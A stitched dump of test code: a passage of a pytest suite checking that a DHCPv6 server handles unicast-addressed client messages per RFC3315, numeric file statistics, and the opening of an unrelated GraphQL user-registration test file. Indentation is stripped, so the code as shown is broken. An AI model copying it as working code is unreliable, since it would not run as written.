srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_global_confirm():
# Server MUST discard any Confirm it receives with
# a unicast address destination
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# GLOBAL_UNICAST dest CONFIRM -->
# X REPLY
# correct message CONFIRM -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
misc.test_setup()
# Server is configured with 3000::/64 subnet with 3000::1-3000::ff pool.
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('CONFIRM')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('CONFIRM')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '13')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_global_rebind():
# Server MUST discard any Rebind it receives with
# a unicast address destination.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# GLOBAL_UNICAST dest REBIND -->
# X REPLY
# correct message REBIND -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REBIND')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REBIND')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_global_inforequest():
# Server MUST discard any Information-Request it receives with
# a unicast address destination.
# Message details Client Server
# GLOBAL_UNICAST dest INFOREQUEST -->
# X REPLY
# correct message INFOREQUEST -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.config_srv_opt('preference', '123')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.unicast_addres('GLOBAL', None)
# message wont contain client-id option
srv_msg.client_send_msg('INFOREQUEST')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
# message wont contain client-id option
srv_msg.client_requests_option('7')
srv_msg.client_send_msg('INFOREQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', 'NOT ', '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '7')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_global_request():
# Server MUST discard any Request message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
# In this test if it fails with 'NoAddrAvail' at the end
# it means that server has send back REPLY with UseMulticast
# status code but also assigned address.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# GLOBAL_UNICAST dest REQUEST -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status code option with UseMulticast
#
# SOLICIT -->
# <-- ADVERTISE
# correct message REQUEST -->
# <-- REPLY
# REPLY MUST include option:
# client-id
# server-id
# IA_NA
# IA_Address with address 3000::1.
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_save_option('server-id')
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'address', '3000::1')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_global_renew():
# Server MUST discard any RENEW message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# GLOBAL UNICAST dest RENEW -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status code with UseMulticast
# correct message RENEW -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA
# IA-Address
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_save_option('IA_NA')
srv_msg.client_save_option('server-id')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_global_release():
# Server MUST discard any RELEASE message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
#
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# GLOBAL UNICAST dest RELEASE -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status-code with UseMulticast
# correct message RELEASE -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status-code with Success
misc.test_setup()
# Server is configured with 3000::/64 subnet with 3000::1-3000::ff pool.
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_save_option('IA_NA')
srv_msg.client_save_option('server-id')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '13')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_local_solicit():
# Server MUST discard any Solicit it receives with
# a unicast address destination
# Message details Client Server
# LINK_LOCAL_UNICAST dest SOLICIT -->
# X ADVERTISE
# correct message SOLICIT -->
# <-- ADVERTISE
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_local_confirm():
# Server MUST discard any Confirm it receives with
# a unicast address destination
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# LINK_LOCAL_UNICAST dest CONFIRM -->
# X REPLY
# correct message CONFIRM -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('CONFIRM')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('CONFIRM')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '13')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_local_rebind():
# Server MUST discard any Rebind it receives with
# a unicast address destination.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# LINK_LOCAL
# UNICAST dest REBIND -->
# X REPLY
# correct message REBIND -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REBIND')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REBIND')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_local_inforequest():
# Server MUST discard any Information-Request it receives with
# a unicast address destination.
# Message details Client Server
# LINK_LOCAL
# UNICAST dest INFOREQUEST -->
# X REPLY
# correct message INFOREQUEST -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.config_srv_opt('preference', '123')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.unicast_addres(None, 'LINK_LOCAL')
# message wont contain client-id option
srv_msg.client_send_msg('INFOREQUEST')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_requests_option('7')
# message wont contain client-id option
srv_msg.client_send_msg('INFOREQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', 'NOT ', '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '7')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_local_request():
# Server MUST discard any Request message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
# In this test if it fails with 'NoAddrAvail' at the end
# it means that server has send back REPLY with UseMulticast
# status code but also assigned address.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# LINK_LOCAL
# UNICAST dest REQUEST -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status code option with UseMulticast
#
# SOLICIT -->
# <-- ADVERTISE
# correct message REQUEST -->
# <-- REPLY
# REPLY MUST include option:
# client-id
# server-id
# IA_NA
# IA_Address with address 3000::1.
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::1')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_save_option('server-id')
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'address', '3000::1')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_local_renew():
# Server MUST discard any RENEW message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# LINK_LOCAL
# UNICAST dest RENEW -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status code with UseMulticast
# correct message RENEW -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA
# IA-Address
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_save_option('IA_NA')
srv_msg.client_save_option('server-id')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_local_release():
# Server MUST discard any RELEASE message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
#
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# LINK_LOCAL
# UNICAST dest RELEASE -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status-code with UseMulticast
# correct message RELEASE -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status-code with Success
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_save_option('IA_NA')
srv_msg.client_save_option('server-id')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '13')
references.references_check('RFC3315')
| 34.986653
| 94
| 0.660622
| 4,377
| 34,077
| 4.807631
| 0.030158
| 0.085824
| 0.099225
| 0.059592
| 0.991921
| 0.991921
| 0.991921
| 0.991921
| 0.991921
| 0.989118
| 0
| 0.018533
| 0.216216
| 34,077
| 973
| 95
| 35.02261
| 0.769329
| 0.205945
| 0
| 0.965035
| 0
| 0
| 0.143401
| 0.006008
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024476
| true
| 0.08042
| 0.008741
| 0
| 0.033217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
4f1ffa81a9cbebe3dee8e8462fdb8186d8ea9338
| 12,558
|
py
|
Python
|
app/tests/test_mutations.py
|
yeeeeees/eventio-backend
|
85f245220c36e1e8a243097cbb9ca68533b69c7e
|
[
"Apache-2.0"
] | 2
|
2020-02-04T07:48:48.000Z
|
2020-03-03T11:15:54.000Z
|
app/tests/test_mutations.py
|
yeeeeees/eventio-backend
|
85f245220c36e1e8a243097cbb9ca68533b69c7e
|
[
"Apache-2.0"
] | 4
|
2020-02-01T15:42:13.000Z
|
2020-02-03T21:03:02.000Z
|
app/tests/test_mutations.py
|
yeeeeees/eventio-backend
|
85f245220c36e1e8a243097cbb9ca68533b69c7e
|
[
"Apache-2.0"
] | null | null | null |
import json
import unittest
from app.schema import schema
from app import create_app, db
from graphene.test import Client
from app.config import TestingConfig
class TestCreateUser(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
self.query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
}
}'''
def tearDown(self):
with self.app.app_context():
db.drop_all()
def test_okay_register(self):
response = self.client.post("/graphql", data={"query": self.query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("createUser").get("success") == True
def test_taken_username_register(self):
query2 = '''mutation{
createUser(email:"test2@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": self.query})
response = self.client.post("/graphql", data={"query": query2})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("createUser").get("message") == "That username is already taken. Plesae try again with different username."
def test_taken_email_register(self):
query2 = '''mutation{
createUser(email:"test@user.com", username:"test_user2", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": self.query})
response = self.client.post("/graphql", data={"query": query2})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("createUser").get("message") == "That email is already in use. Plesae try again with different email."
class TestLoginUser(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": query})
def tearDown(self):
with self.app.app_context():
db.drop_all()
def test_successful_login(self):
query = '''mutation{
loginUser(username:"test_user", password:"test"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("success") == True
def test_no_info_login(self):
